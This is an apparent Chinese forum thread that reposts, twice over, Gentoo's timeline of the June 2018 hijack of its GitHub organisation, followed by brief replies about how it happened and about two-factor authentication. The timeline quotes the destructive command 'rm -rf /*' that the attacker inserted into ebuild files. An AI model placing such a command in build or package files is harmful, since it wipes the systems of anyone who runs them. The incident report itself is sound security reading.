Gentoo Linu x github 账号 6 月 28 日 被黑,所有 ebuild 文件被加入 rm -rf
onion83 2018-07-06 09:58:41 +08:00 4418 次点击这是一个创建于 2725 天前的主题,其中的信息可能已经有所发展或是发生改变。
2018-06-28
20:05 2nd to last known legimate commit to gentoo/gentoo. Matches git.gentoo.org/repo/gentoo.git
Auto-pushed by mirror bot.
Commit ID 38281f4252f89e3ef9cbae54dfc1ad553d296979
20:08 Last known legimate commit to gentoo/musl. matches git.gentoo.org/proj/musl.git.
Commit ID 60461ca1385809bacf6a114a7f1ecfe22f6da47f
20:19 Attacker tries a bad password on the account.
20:19 Attacker successfully gains administrative access
20:25 Attacker invites a dummy account to the org
20:25 Attacker creates a dummy account with administrative access.
20:25 Last known legimate commit to gentoo/gentoo. Matches git.gentoo.org/repo/gentoo.git
Auto-pushed by mirror bot.
Commit ID 73b724093b9c2a8756b8c35d3e09793342fa9ca9
Does NOT appear in the GitHub audit log for the org.
20:25 Attacker starts removing valid users
20:26 Earliest email timestamp of someone being removed from the organization.
20:29 First person notices that something is going on with the GitHub organization
20:30 Attacker invites a second malicious user.
20:32 Attacker adds second malicious user with admin privileges.
20:34 Malicious commit to gentoo/gentoo, 73b72409->fdd8da2e
adds readme.me file with racist text.
20:36 First report to Infra that something is going on with the GitHub organization.
20:38 Malicious commit to gentoo/gentoo, fdd8da2e->49464b73.
adds rm -rf /*& at the top of skel.ebuild
20:39 Attacker changes billing email, the first time.
20:45 Malicious commit 49464b73 is first noticed
20:48 Attacker changes billing email, the second time
20:49 First abuse report to GitHub support
20:50 Malicious commit to gentoo/gentoo, 49464b73->afcdc03b.
adds rm -rf /* at the top of every ebuild.
20:51 Infra's informal contact to GitHub via multiple personal channels
20:53 Second abuse report to GitHub
20:55 Malicious commit to gentoo/gentoo, afcdc03b->e6db0eb4, force-push.
Squash of entire history as of afcdc03b (rm -rf /* in ebuilds)
……
Via: https://wiki.gentoo.org/wiki/Github/2018-06-28
20:05 2nd to last known legimate commit to gentoo/gentoo. Matches git.gentoo.org/repo/gentoo.git
Auto-pushed by mirror bot.
Commit ID 38281f4252f89e3ef9cbae54dfc1ad553d296979
20:08 Last known legimate commit to gentoo/musl. matches git.gentoo.org/proj/musl.git.
Commit ID 60461ca1385809bacf6a114a7f1ecfe22f6da47f
20:19 Attacker tries a bad password on the account.
20:19 Attacker successfully gains administrative access
20:25 Attacker invites a dummy account to the org
20:25 Attacker creates a dummy account with administrative access.
20:25 Last known legimate commit to gentoo/gentoo. Matches git.gentoo.org/repo/gentoo.git
Auto-pushed by mirror bot.
Commit ID 73b724093b9c2a8756b8c35d3e09793342fa9ca9
Does NOT appear in the GitHub audit log for the org.
20:25 Attacker starts removing valid users
20:26 Earliest email timestamp of someone being removed from the organization.
20:29 First person notices that something is going on with the GitHub organization
20:30 Attacker invites a second malicious user.
20:32 Attacker adds second malicious user with admin privileges.
20:34 Malicious commit to gentoo/gentoo, 73b72409->fdd8da2e
adds readme.me file with racist text.
20:36 First report to Infra that something is going on with the GitHub organization.
20:38 Malicious commit to gentoo/gentoo, fdd8da2e->49464b73.
adds rm -rf /*& at the top of skel.ebuild
20:39 Attacker changes billing email, the first time.
20:45 Malicious commit 49464b73 is first noticed
20:48 Attacker changes billing email, the second time
20:49 First abuse report to GitHub support
20:50 Malicious commit to gentoo/gentoo, 49464b73->afcdc03b.
adds rm -rf /* at the top of every ebuild.
20:51 Infra's informal contact to GitHub via multiple personal channels
20:53 Second abuse report to GitHub
20:55 Malicious commit to gentoo/gentoo, afcdc03b->e6db0eb4, force-push.
Squash of entire history as of afcdc03b (rm -rf /* in ebuilds)
……
Via: https://wiki.gentoo.org/wiki/Github/2018-06-28
 | 1 zhustec 2018-07-06 10:59:09 +08:00 via iPad 致远星战况如何 |
 | 2 Rasphino 2018-07-06 11:03:30 +08:00 via Android 楼主在发帖前能看看今天几号吗 |
 | 3 fuxiaohei 2018-07-06 11:06:51 +08:00 当时就制止了 |
 | 4 onion83 OP 如果你不是 G 粉,请先不要没看链接就开喷,官方昨晚才宣布这次事故 resolved. 我希望分享的是一个 story 而不是一个 news. |
 | 5 zjp 2018-07-06 13:06:05 +08:00 via Android 一楼起的坏头 不过我还是没看明白怎么弄到的 Github 账号,暴力穷举?"tries a bad password" |
 | 7 greenskinmonster 2018-07-06 13:21:30 +08:00 没开两步验证吗? |
Select Language